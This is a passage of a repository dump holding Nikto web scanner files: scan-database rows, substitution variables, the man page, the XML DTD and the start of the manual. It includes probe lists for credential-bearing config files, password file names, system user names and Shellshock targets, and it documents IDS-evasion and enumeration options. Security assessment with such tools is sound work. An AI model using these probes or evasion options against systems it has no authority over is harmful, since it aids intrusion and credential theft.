directory has indexing enabled.\",\"\",\"\"\n\"007284\",\"0\",\"1\",\"/etc/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"'/etc directory has indexing enabled.\",\"\",\"\"\n\"007285\",\"0\",\"12\",\"/.ftpconfig\",\"GET\",\"\\\"port\\\":\",\"\",\"\",\"\",\"\",\"This file may contain login credentials.\",\"\",\"\"\n\"007286\",\"0\",\"12\",\"/.remote-sync.json\",\"GET\",\"\\\"port\\\":\",\"\",\"\",\"\",\"\",\"This file may contain login credentials.\",\"\",\"\"\n\"007287\",\"0\",\"12\",\"/.vscode/ftp-sync.json\",\"GET\",\"\\\"port\\\":\",\"\",\"\",\"\",\"\",\"This VSCode file may contain login credentials.\",\"\",\"\"\n\"007288\",\"0\",\"12\",\"/.vscode/sftp.json\",\"GET\",\"\\\"port\\\":\",\"\",\"\",\"\",\"\",\"This VSCode file may contain login credentials.\",\"\",\"\"\n\"007289\",\"0\",\"12\",\"/deployment-config.json\",\"GET\",\"\\\"port\\\":\",\"\",\"\",\"\",\"\",\"This file may contain login credentials.\",\"\",\"\"\n\"007290\",\"0\",\"12\",\"/ftpsync.settings\",\"GET\",\"\\\"port\\\":\",\"\",\"\",\"\",\"\",\"This file may contain login credentials.\",\"\",\"\"\n\"007291\",\"0\",\"12\",\"/sftp-config.json\",\"GET\",\"\\\"port\\\":\",\"\",\"\",\"\",\"\",\"This file may contain login credentials.\",\"\",\"\"\n\"007292\",\"0\",\"1\",\"/Service/\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007293\",\"0\",\"1\",\"/Services/\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007294\",\"0\",\"1\",\"/Services/BackOfficeService.svc?wsdl\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007295\",\"0\",\"1\",\"/Service/BackOfficeService.svc?wsdl\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007296\",\"0\",\"1\",\"/Service/Service.svc\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007297\",\"0\",\"1\",\"/Services/Service`.svc\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007298\",\"0\",\"1\",\"/Service/Service1.svc\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007299\",\"0\",\"1\",\"/Services/Service1`.svc\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007300\",\"0\",\"1\",\"/BackOffice/Services/\",\"GET\",\"You have created a service\",\"\",\"\",\"\",\"\",\"WCF endpoint found.\",\"\",\"\"\n\"007301\",\"0\",\"3\",\"/phpci.yml\",\"GET\",\"build_settings:\",\"\",\"\",\"\",\"\",\"PHP CI config file found.\",\"\",\"\"\n\"007302\",\"0\",\"1\",\"/README.md\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Readme Found\",\"\",\"\"\n\"007303\",\"0\",\"3\",\"/JAMonAdmin.jsp\",\"GET\",\"200\",\"\\| JAMonAdmin \\|\",\"\",\"\",\"\",\"JAMon - Java Application Monitor Admin interface. Versions 2.7 and earlier are affected by CVE-2013-6235\",\"\",\"\"\n\"007304\",\"0\",\"7\",\"/hsqldb;\",\"GET\",\"<title>HSQL Database Engine Servlet</title>\",\"\",\"\",\"\",\"\",\"The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec. CVE-2020-5902.\",\"\",\"\"\n"
  },
  {
    "path": "nikto/program/databases/db_variables",
    "content": "#VERSION,2.004\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# Variables which will be used as replacements for values in the scan_database.db and user_scan_database.db files.\n# Any values to be replaced must start with the @ character, such as: @CGIDIRS.\n#\n# User defined variables should be set in config.txt as this file may be over-written during updates.\n#######################################################################\n@CGIDIRS=/cgi.cgi/ /webcgi/ /cgi-914/ /cgi-915/ /bin/ /cgi/ /mpcgi/ /cgi-bin/ /ows-bin/ /cgi-sys/ /cgi-local/ /htbin/ /cgibin/ /cgis/ /scripts/ /cgi-win/ /fcgi-bin/ /cgi-exe/ /cgi-home/ /cgi-perl/ /scgi-bin/ /cgi-bin-sdb/ /cgi-mod/\n@NUKE=/ /postnuke/ /postnuke/html/ /modules/ /phpBB/ /forum/\n@ADMIN=/admin/ /adm/ /administrator/\n@USERS=adm bin daemon ftp guest listen lp mysql noaccess nobody nobody4 nuucp operator root smmsp smtp sshd sys test unknown uucp web www\n@PASSWORDDIRS=/ /admin/ /clients/ /pass/ /password/ /passwords/ /store/ /users/ /access/ /members/ /private/ /ccbill/ /dmr/ /mastergate/ /dmr/ /epoch/ /netbilling/ /webcash/ /wwwjoin/ /etc/security/\n@PASSWORDFILES=admins clients pass password passwords passwd passwd.adjunct store users .htpasswd .passwd\n@PHPMYADMIN=/3rdparty/phpMyAdmin/ /phpMyAdmin/ /3rdparty/phpmyadmin/ /phpmyadmin/ /pma/ /.tools/phpMyAdmin/current/\n@HTTPFOUND=200 301 302 403\n@FCKEDITOR=/fckeditor/ /FCKeditor/ /Script/fckeditor/ /sites/all/modules/fckeditor/fckeditor/ /modules/fckeditor/fckeditor/ /class/fckeditor/ /inc/fckeditor/ /sites/all/libraries/fckeditor/ /js/editor/fckeditor/ /includes/fckeditor/ /include/fckeditor/ /modules/fckeditor/ /plugins/fckeditor/\n@CRYSTALREPORTS=/ /CrystalReports/ /crystal/ /businessobjects/ /crystal/enterprise10/ /crystal/Enterprise10/ePortfolio/en/\n@OWNCLOUD=/ /cloud/ /owncloud/ /ownCloud/ /OwnCloud/\n@OCFILES=data/owncloud.log data/htaccesstest.txt data/owncloud.db\n@SECLORE=/ /filesecure/ /policyserver/\n@SHELLSHOCK= admin.cgi administrator.cgi authLogin.cgi bb-hist.sh banner.cgi book.cgi cgiinfo.cgi cgitest.py cgi_wrapper contact.cgi count.cgi defaultwebpage.cgi download.cgi entropysearch.cgi env.cgi environment.cgi ezmlm-browse formmail.cgi FormMail-clone.cgi guestbook.cgi helpdesk.cgi index.cgi index.php index.pl info.cgi info.sh loadpage.cgi login.cgi login.php login.pl pathtest.pl php php4 php5 php-cgi php.cgi php.fcgi printenv restore_config.cgi ruby.rb search search.cgi server.php status sysinfo.pl test test-cgi test.cgi test_cgi.php test.cgi.php test_cgi.pl test-cgi.pl test.py test.sh tmUnblock.cgi uname.cgi viewcvs.cgi welcome whois.cgi\n@TYPO3=/ /cms/ /site/ /typo/ /typo3/\n@AXIS2=/ /axis/ /axis2/ /imcws/ /WebServiceImpl/ /dswsbobje/ /ws/\n@MODIR=/ /phpmoadmin/ /wu-moadmin/ /moadmin/\n@MOFILE=moadmin.php wu-moadmin.php\n@ADOBEXML=/flex2gateway/ /flex2gateway/http /flex2gateway/httpsecure /flex2gateway/cfamfpoolling /flex2gateway/amf /flex2gateway/amfpolling /messagebroker/http /messagebroker/httpsecure /blazeds/messagebroker/http /blazeds/messagebroker/httpsecure /samples/messagebroker/http /samples/messagebroker/httpsecure /lcds/messagebroker/http /lcds/messagebroker/httpsecure /lcds-samples/messagebroker/http /lcds-samples/messagebroker/httpsecure\n@JENKINS=/ /jenkins/ /hudson/\n@RAINLOOP=/ /rainloop/ /webmail/\n@TOMCATADMIN=/manager/ /jk-manager/ /jk-status/ /admin/ /host-manager/\n@PHPINFODIRS=/ /test/\n@PHPINFOFILES=phpinfo.php phpinfo.php3 test.php info.php index.php php_info.php\n@MANTIS=/ /mantis/ /mantisbt/\n@DOKUWIKI=/ /wiki/ /dokuwiki/\n@ROCKMONGO=/ /rockmongo/ /rock-mongo/\n@MAGENTO=/ /magento/ /shop/\n@MAGMI=/ /magmi/ /magmi-importer/ /magento/magmi/ /magento/magmi-importer/ /shop/magmi/ /shop/magmi-importer/\n@HYBRIS=/ /hmc/ /hac/\n@PIWIK=/ /piwik/ /analytics/\n@FORUM=/ /forum/ /forums/ /forumz/ /htforum/ /board/ /community/\n@VBULLETIN=/vb/ /vbulletin/\n@PAGESPEED=/ngx_pagespeed_statistics /ngx_pagespeed_global_statistics /ngx_pagespeed_message /mod_pagespeed_statistics /mod_pagespeed_global_statistics /mod_pagespeed_message /pagespeed_console /pagespeed_admin/ /pagespeed_global_admin/\n@SYMPHONY=/ /cms/ /symphony/\n@CKEDITOR=/ /ckeditor/ /admin/ckeditor/ /sites/all/modules/ckeditor/ /resources/ckeditor/ /clientscript/ckeditor/ /wp-content/plugins/ckeditor-for-wordpress/ckeditor/\n@STRUTSACTIONS=/ /index.action /login.action\n@WORDPRESS=/ /wordpress/\n"
  },
  {
    "path": "nikto/program/docs/nikto.1",
    "content": ".\\\"     Title: nikto\n.\\\"    Author: \n.\\\" Generator: DocBook XSL Stylesheets v1.73.2 <http://docbook.sf.net/>\n.\\\"      Date: 01/19/2010\n.\\\"    Manual: \n.\\\"    Source: \n.\\\"\n.TH \"NIKTO\" \"1\" \"01/19/2010\" \"\" \"\"\n.\\\" disable hyphenation\n.nh\n.\\\" disable justification (adjust text to left margin only)\n.ad l\n.SH \"NAME\"\nnikto \\- Scan web server for known vulnerabilities\n.SH \"SYNOPSIS\"\n.HP 21\n\\fBnikto\\fR [options...]\n.SH \"DESCRIPTION\"\n.PP\nExamine a web server to find potential problems and security vulnerabilities, including:\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Server and software misconfigurations\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Default files and programs\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Insecure files and programs\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Outdated servers and programs\n.RE\n.PP\nNikto is built on LibWhisker (by RFP) and can run on any platform which has a Perl environment\\&. It supports SSL, proxies, host authentication, IDS evasion and more\\&. It can be updated automatically from the command\\-line, and supports the optional submission of updated version data back to the maintainers\\&.\n.SH \"OPTIONS\"\n.PP\nBelow are all of the Nikto command line options and explanations\\&. A brief version of this text is available by running Nikto with the \\-h (\\-help) option\\&.\n.PP\n\\fB\\-Cgidirs\\fR\n.RS 4\nScan these CGI directories\\&. Special words \"none\" or \"all\" may be used to scan all CGI directories or none, (respectively)\\&. A literal value for a CGI directory such as \"/cgi\\-test/\" may be specified (must include trailing slash)\\&. If this is option is not specified, all CGI directories listed in config\\&.txt will be tested\\&.\n.RE\n.PP\n\\fB\\-config\\fR\n.RS 4\nSpecify an alternative config file to use instead of the config\\&.txt located in the install directory\\&.\n.RE\n.PP\n\\fB\\-dbcheck\\fR\n.RS 4\nCheck the scan databases for syntax errors\\&.\n.RE\n.PP\n\\fB\\-Display\\fR\n.RS 4\nControl the output that Nikto shows\\&. See Chapter 5 for detailed information on these options\\&. Use the reference number or letter to specify the type, multiple may be used:\n.sp\n1 \\- Show redirects\n.sp\n2 \\- Show cookies received\n.sp\n3 \\- Show all 200/OK responses\n.sp\n4 \\- Show URLs which require authentication\n.sp\nD \\- Debug Output\n.sp\nV \\- Verbose Output\n.RE\n.PP\n\\fB\\-evasion\\fR\n.RS 4\nSpecify the LibWhisker IDS evasion technique to use (see the LibWhisker docs for detailed information on these)\\&. Use the reference number to specify the type, multiple may be used:\n.sp\n1 \\- Random URI encoding (non\\-UTF8)\n.sp\n2 \\- Directory self\\-reference (/\\&./)\n.sp\n3 \\- Premature URL ending\n.sp\n4 \\- Prepend long random string\n.sp\n5 \\- Fake parameter\n.sp\n6 \\- TAB as request spacer\n.sp\n7 \\- Change the case of the URL\n.sp\n8 \\- Use Windows directory separator (\\e)\n.RE\n.PP\n\\fB\\-findonly\\fR\n.RS 4\nOnly discover the HTTP(S) ports, do not perform a security scan\\&. This will attempt to connect with HTTP or HTTPS, and report the Server header\\&.\n.RE\n.PP\n\\fB\\-Format\\fR\n.RS 4\nSave the output file specified with \\-o (\\-output) option in this format\\&. If not specified, the default will be taken from the file extension specified in the \\-output option\\&. Valid formats are:\n.sp\ncsv \\- a comma\\-seperated list\n.sp\nhtm \\- an HTML report\n.sp\ntxt \\- a text report\n.sp\nxml \\- an XML report\n.RE\n.PP\n\\fB\\-host\\fR\n.RS 4\nHost(s) to target\\&. Can be an IP address, hostname or text file of hosts\\&. A single dash (\\-) maybe used for stdout\\&. Can also parse nmap \\-oG style output\n.RE\n.PP\n\\fB\\-Help\\fR\n.RS 4\nDisplay extended help information\\&.\n.RE\n.PP\n\\fB\\-id\\fR\n.RS 4\nID and password to use for host Basic host authentication\\&. Format is \"id:password\"\\&.\n.RE\n.PP\n\\fB\\-list\\-plugins\\fR\n.RS 4\nWill list all plugins that Nikto can run against targets and then will exit without performing a scan\\&. These can be tuned for a session using the \\-plugins option\\&.\n.sp\nThe output format is:\n.sp\nPlugin\n\\fIname\\fR\n.sp\n\\ \\&\\fIfull name\\fR\n\\-\n\\fIdescription\\fR\n.sp\n\\ \\&Written by\n\\fIauthor\\fR, Copyright (C)\n\\fIcopyright\\fR\n.RE\n.PP\n\\fB\\-mutate\\fR\n.RS 4\nSpecify mutation technique\\&. A mutation will cause Nikto to combine tests or attempt to guess values\\&. These techniques may cause a tremendous amount of tests to be launched against the target\\&. Use the reference number to specify the type, multiple may be used:\n.sp\n1 \\- Test all files with all root directories\n.sp\n2 \\- Guess for password file names\n.sp\n3 \\- Enumerate user names via Apache (/~user type requests)\n.sp\n4 \\- Enumerate user names via cgiwrap (/cgi\\-bin/cgiwrap/~user type requests)\n.sp\n5 \\- Attempt to brute force sub\\-domain names, assume that the host name is the parent domain\n.sp\n6 \\- Attempt to guess directory names from the supplied dictionary file\n.RE\n.PP\n\\fB\\-mutate\\-options\\fR\n.RS 4\nProvide extra information for mutates, e\\&.g\\&. a dictionary file\n.RE\n.PP\n\\fB\\-nolookup\\fR\n.RS 4\nDo not perform name lookups on IP addresses\\&.\n.RE\n.PP\n\\fB\\-nossl\\fR\n.RS 4\nDo not use SSL to connect to the server\\&.\n.RE\n.PP\n\\fB\\-no404\\fR\n.RS 4\nDisable 404 (file not found) checking\\&. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device\\&. This will generally lead to more false positives being discovered\\&.\n.RE\n.PP\n\\fB\\-output\\fR\n.RS 4\nWrite output to the file specified\\&. The format used will be taken from the file extension\\&. This can be over\\-riden by using the \\-Format option (e\\&.g\\&. to write text files with a different extension\\&. Existing files will have new information appended\\&.\n.RE\n.PP\n\\fB\\-plugins\\fR\n.RS 4\nSelect which plugins will be run on the specified targets\\&. A comma separated list should be provided which lists the names of the plugins\\&. The names can be found by using \\-list\\-plugins\\&.\n.sp\nThere are two special entries: ALL, which specifies all plugins shall be run and NONE, which specifies no plugins shall be run\\&. The default is ALL\n.RE\n.PP\n\\fB\\-port\\fR\n.RS 4\nTCP port(s) to target\\&. To test more than one port on the same host, specify the list of ports in the \\-p (\\-port) option\\&. Ports can be specified as a range (i\\&.e\\&., 80\\-90), or as a comma\\-delimited list, (i\\&.e\\&., 80,88,90)\\&. If not specified, port 80 is used\\&.\n.RE\n.PP\n\\fB\\-Pause\\fR\n.RS 4\nSeconds to delay between each test\\&.\n.RE\n.PP\n\\fB\\-root\\fR\n.RS 4\nPrepend the value specified to the beginning of every request\\&. This is useful to test applications or web servers which have all of their files under a certain directory\\&.\n.RE\n.PP\n\\fB\\-ssl\\fR\n.RS 4\nOnly test SSL on the ports specified\\&. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first\\&.\n.RE\n.PP\n\\fB\\-Single\\fR\n.RS 4\nPerform a single request to a target server\\&. Nikto will prompt for all options which can be specified, and then report the detailed output\\&. See Chapter 5 for detailed information\\&.\n.RE\n.PP\n\\fB\\-timeout\\fR\n.RS 4\nSeconds to wait before timing out a request\\&. Default timeout is 10 seconds\\&.\n.RE\n.PP\n\\fB\\-Tuning\\fR\n.RS 4\nTuning options will control the test that Nikto will use against a target\\&. By default, if any options are specified, only those tests will be performed\\&. If the \"x\" option is used, it will reverse the logic and exclude only those tests\\&. Use the reference number or letter to specify the type, multiple may be used:\n.sp\n0 \\- File Upload\n.sp\n1 \\- Interesting File / Seen in logs\n.sp\n2 \\- Misconfiguration / Default File\n.sp\n3 \\- Information Disclosure\n.sp\n4 \\- Injection (XSS/Script/HTML)\n.sp\n5 \\- Remote File Retrieval \\- Inside Web Root\n.sp\n6 \\- Denial of Service\n.sp\n7 \\- Remote File Retrieval \\- Server Wide\n.sp\n8 \\- Command Execution / Remote Shell\n.sp\n9 \\- SQL Injection\n.sp\na \\- Authentication Bypass\n.sp\nb \\- Software Identification\n.sp\nc \\- Remote Source Inclusion\n.sp\nx \\- Reverse Tuning Options (i\\&.e\\&., include all except specified)\n.sp\nThe given string will be parsed from left to right, any x characters will apply to all characters to the right of the character\\&.\n.RE\n.PP\n\\fB\\-useproxy\\fR\n.RS 4\nUse the HTTP proxy defined in the configuration file\\&.\n.RE\n.PP\n\\fB\\-update\\fR\n.RS 4\nUpdate the plugins and databases directly from cirt\\&.net\\&.\n.RE\n.PP\n\\fB\\-Version\\fR\n.RS 4\nDisplay the Nikto software, plugin and database versions\\&.\n.RE\n.PP\n\\fB\\-vhost\\fR\n.RS 4\nSpecify the Host header to be sent to the target\\&.\n.RE\n.SH \"FILES\"\n.PP\n\\fInikto\\&.conf\\fR\n.RS 4\nThe Nikto configuration file\\&. This sets Nikto\\'s global options\\&. Several nikto\\&.conf files may exist and are parsed in the below order\\&. As each configuration file is loaded is supersedes any previously set configuration:\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'System wide (e\\&.g\\&. /etc/nikto\\&.conf)\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Home directory (e\\&.g\\&. $HOME/nikto\\&.conf)\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Current directory (e\\&.g\\&. \\&./nikto\\&.conf)\n.RE\n.RE\n.PP\n\\fI${NIKTO_DIR}/plugins/db*\\fR\n.RS 4\ndb files are the databases that nikto uses to check for vulnerabilities and issues within the web server\\&.\n.RE\n.PP\n\\fI${NIKTO_DIR}/plugins/*\\&.plugin\\fR\n.RS 4\nAll nikto\\'s plugins exist here\\&. Nikto itself is just a wrapper script to manage CLI and pass through to the plugins\\&.\n.RE\n.PP\n\\fI${NIKTO_DIR}/templates\\fR\n.RS 4\nContains the templates for nikto\\'s output formats\\&.\n.RE\n.SH \"BUGS\"\n.PP\nThe current features are not supported:\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'SOCKS Proxies\n.RE\n.SH \"AUTHORS\"\n.PP\nNikto is written and maintained by Chris Sullo and David Lodge\\&. See the main documentation for other contributors\\&.\n.PP\nAll code is (C) Chris Sullo\\&., except LibWhisker which is (C) rfp\\&.labs (wiretrip\\&.net)\\&. Other portions of code may be (C) as specified\\&.\n.SH \"SEE ALSO\"\n.PP\n\n\\fINikto Homepage\\fR\\&[1]\n.SH \"NOTES\"\n.IP \" 1.\" 4\nNikto Homepage\n.RS 4\n\\%https://cirt.net/\n.RE\n"
  },
  {
    "path": "nikto/program/docs/nikto.dtd",
    "content": "<!ELEMENT niktoscan (scandetails*,statistics?)>\n<!ATTLIST niktoscan hoststest CDATA #IMPLIED>\n<!ATTLIST niktoscan options CDATA #REQUIRED>\n<!ATTLIST niktoscan version CDATA #REQUIRED>\n<!ATTLIST niktoscan scanstart CDATA #REQUIRED>\n<!ATTLIST niktoscan scanend CDATA #REQUIRED>\n<!ATTLIST niktoscan scanelapsed CDATA #REQUIRED>\n<!ATTLIST niktoscan nxmlversion CDATA #REQUIRED>\n\n<!ELEMENT scandetails (item*,statistics?,ssl?)>\n<!ATTLIST scandetails targetip CDATA #REQUIRED>\n<!ATTLIST scandetails targethostname CDATA #REQUIRED>\n<!ATTLIST scandetails targetport CDATA #REQUIRED>\n<!ATTLIST scandetails targetbanner CDATA #REQUIRED>\n<!ATTLIST scandetails starttime CDATA #REQUIRED>\n<!ATTLIST scandetails sitename CDATA #REQUIRED>\n<!ATTLIST scandetails siteip CDATA #REQUIRED>\n<!ATTLIST scandetails hostheader CDATA #IMPLIED>\n<!ATTLIST scandetails errors CDATA #REQUIRED>\n<!ATTLIST scandetails checks CDATA #REQUIRED>\n\n<!ELEMENT ssl EMPTY>\n<!ATTLIST ssl ciphers CDATA #IMPLIED>\n<!ATTLIST ssl issuers CDATA #REQUIRED>\n<!ATTLIST ssl info CDATA #REQUIRED>\n\n<!ELEMENT item (description,uri?,namelink?,iplink?)>\n<!ATTLIST item id CDATA #REQUIRED>\n<!ATTLIST item osvdbid CDATA #IMPLIED>\n<!ATTLIST item osvdblink CDATA #IMPLIED>\n<!ATTLIST item method CDATA #IMPLIED>\n\n<!ELEMENT description ANY>\n<!ELEMENT uri ANY>\n<!ELEMENT namelink ANY>\n<!ELEMENT iplink ANY>\n\n<!ELEMENT statistics EMPTY>\n<!ATTLIST statistics itemstested CDATA #IMPLIED>\n<!ATTLIST statistics itemsfound CDATA #IMPLIED>\n<!ATTLIST statistics elapsed CDATA #IMPLIED>\n<!ATTLIST statistics endtime CDATA #IMPLIED>\n"
  },
  {
    "path": "nikto/program/docs/nikto_manual.html",
    "content": "<html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=ISO-8859-1\"><title>Nikto v2.1.0 - The Manual</title><link rel=\"stylesheet\" href=\"doc.css\" type=\"text/css\"><meta name=\"generator\" content=\"DocBook XSL Stylesheets V1.73.2\"></head><body bgcolor=\"white\" text=\"black\" link=\"#0000FF\" vlink=\"#840084\" alink=\"#0000FF\"><div class=\"book\" lang=\"en\"><div class=\"titlepage\"><div><div><h1 class=\"title\"><a name=\"id186254\"></a>Nikto v2.1.0 - The Manual</h1></div></div><hr></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"chapter\"><a href=\"#introduction\">1. Introduction</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id264630\">Overview</a></span></dt><dt><span class=\"section\"><a href=\"#id272958\">Description</a></span></dt><dt><span class=\"section\"><a href=\"#id276660\">Advanced Error Detection Logic</a></span></dt><dt><span class=\"section\"><a href=\"#id238011\">History</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#installation\">2. Installation</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id238042\">Requirements</a></span></dt><dt><span class=\"section\"><a href=\"#id238232\">Install</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#usage\">3. Usage</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id238272\">Basic Testing</a></span></dt><dt><span class=\"section\"><a href=\"#id238384\">Multiple Port Testing</a></span></dt><dt><span class=\"section\"><a href=\"#id238405\">Multiple Host Testing</a></span></dt><dt><span class=\"section\"><a href=\"#id238466\">Using a Proxy</a></span></dt><dt><span class=\"section\"><a href=\"#id238782\">Updating</a></span></dt><dt><span class=\"section\"><a href=\"#id238829\">Integration with Nessus</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#options\">4. Command Line Options</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id238858\">All Options</a></span></dt><dt><span class=\"section\"><a href=\"#id286918\">Mutation Techniques</a></span></dt><dt><span class=\"section\"><a href=\"#id287020\">Display</a></span></dt><dt><span class=\"section\"><a href=\"#id287094\">Scan Tuning</a></span></dt><dt><span class=\"section\"><a href=\"#id287290\">Single Request Mode</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#configuration\">5. Configuration Files</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id287336\">Location</a></span></dt><dt><span class=\"section\"><a href=\"#id237396\">Format</a></span></dt><dt><span class=\"section\"><a href=\"#id237410\">Variables</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#reports\">6. Output and Reports</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id288190\">Export Formats</a></span></dt><dt><span class=\"section\"><a href=\"#id288220\">HTML and XML Customisation</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#expanding\">7. Test and Code Writing</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id288304\">Scan Database Field Values</a></span></dt><dt><span class=\"section\"><a href=\"#id288472\">User-Defined Tests</a></span></dt><dt><span class=\"section\"><a href=\"#id288536\">Scan Database Syntax</a></span></dt><dt><span class=\"section\"><a href=\"#id288564\">Plugins</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id288684\">Initialisation Phase</a></span></dt><dt><span class=\"section\"><a href=\"#id289066\">Reconnaisance Phase</a></span></dt><dt><span class=\"section\"><a href=\"#id289135\">Scan Phase</a></span></dt><dt><span class=\"section\"><a href=\"#id289174\">Reporting Phase</a></span></dt><dt><span class=\"section\"><a href=\"#id289499\">Data Structures</a></span></dt><dt><span class=\"section\"><a href=\"#id289774\">Standard Methods</a></span></dt><dt><span class=\"section\"><a href=\"#id290403\">Global Variables</a></span></dt></dl></dd><dt><span class=\"section\"><a href=\"#id290916\">Test Identifiers</a></span></dt><dt><span class=\"section\"><a href=\"#id291044\">Code Copyrights</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#troubleshooting\">8. Troubleshooting</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id291068\">SOCKS Proxies</a></span></dt><dt><span class=\"section\"><a href=\"#id291078\">Debugging</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#licences\">9. Licences</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id291106\">Nikto</a></span></dt><dt><span class=\"section\"><a href=\"#id291117\">LibWhisker</a></span></dt><dt><span class=\"section\"><a href=\"#id291129\">Tests</a></span></dt></dl></dd><dt><span class=\"chapter\"><a href=\"#credits\">10. Credits</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id291149\">Nikto</a></span></dt><dt><span class=\"section\"><a href=\"#id291161\">Thanks</a></span></dt></dl></dd></dl></div><div class=\"list-of-tables\"><p><b>List of Tables</b></p><dl><dt>7.1. <a href=\"#id288321\">Scan Database Fields</a></dt><dt>7.2. <a href=\"#id289525\">Members of the <span class=\"structname\">Mark</span>\n               structure</a></dt><dt>7.3. <a href=\"#id289678\">Members of the <span class=\"structname\">Vulnerability</span>\n               structure</a></dt><dt>7.4. <a href=\"#id290838\">Members of the <span class=\"structname\">cache</span>\n                  structure</a></dt><dt>7.5. <a href=\"#id290930\">TID Scheme</a></dt></dl></div><div class=\"list-of-examples\"><p><b>List of Examples</b></p><dl><dt>3.1. <a href=\"#id238425\">Valid Hosts File</a></dt><dt>7.1. <a href=\"#id289053\">Example initialisation function</a></dt></dl></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"introduction\"></a>Chapter1.Introduction</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id264630\">Overview</a></span></dt><dt><span class=\"section\"><a href=\"#id272958\">Description</a></span></dt><dt><span class=\"section\"><a href=\"#id276660\">Advanced Error Detection Logic</a></span></dt><dt><span class=\"section\"><a href=\"#id238011\">History</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id264630\"></a>Overview</h2></div></div></div><p>Nikto is a web server assessment tool. It is designed to find\n      various default and insecure files, configurations and programs on any\n      type of web server.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id272958\"></a>Description</h2></div></div></div><p>Examine a web server to find potential problems and security vulnerabilities, including:\n</p><div class=\"itemizedlist\"><ul type=\"disc\"><li><p>Server and software misconfigurations</p></li><li><p>Default files and programs</p></li><li><p>Insecure files and programs</p></li><li><p>Outdated servers and programs</p></li></ul></div><p>\n</p><p>Nikto is built on LibWhisker (by RFP) and can run on any platform\nwhich has a PERL environment. It supports SSL, proxies, host\nauthentication, IDS evasion and more. It can be updated automatically\nfrom the command-line, and supports the optional submission of updated\nversion data back to the maintainers.</p><p>The name \"Nikto\" is taken from the movie \"The Day the Earth Stood\n      Still\", and of course subsequent abuse by Bruce Campbell in \"Army of\n      Darkness\". More information on the pop-culture popularity of Nikto can\n      be found at\n      <a class=\"ulink\" href=\"http://www.blather.net/blather/2005/10/klaatu_barada_nikto_the_day_th.html\" target=\"_top\">http://www.blather.net/blather/2005/10/klaatu_barada_nikto_the_day_th.html</a></p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id276660\"></a>Advanced Error Detection Logic</h2></div></div></div><p>Most web security tools, (including Nikto 1.32 and below), rely\n      heavily on the HTTP response to determine if a page or script exists on\n      the target. Because many servers do not properly adhere to RFC standards\n      and return a 200 \"OK\" response for requests which are not found or\n      forbidden, this can lead to many false-positives. In addition, error\n      responses for various file extensions can differ--the \"not found\"\n      response for a .html file is often different than a .cgi.</p><p>Some testing tools, such as Nessus, also look at the content of\n      the response to help eliminate these false positives. While often\n      effective, this method relies on pre-defined strings to help eliminate\n      false 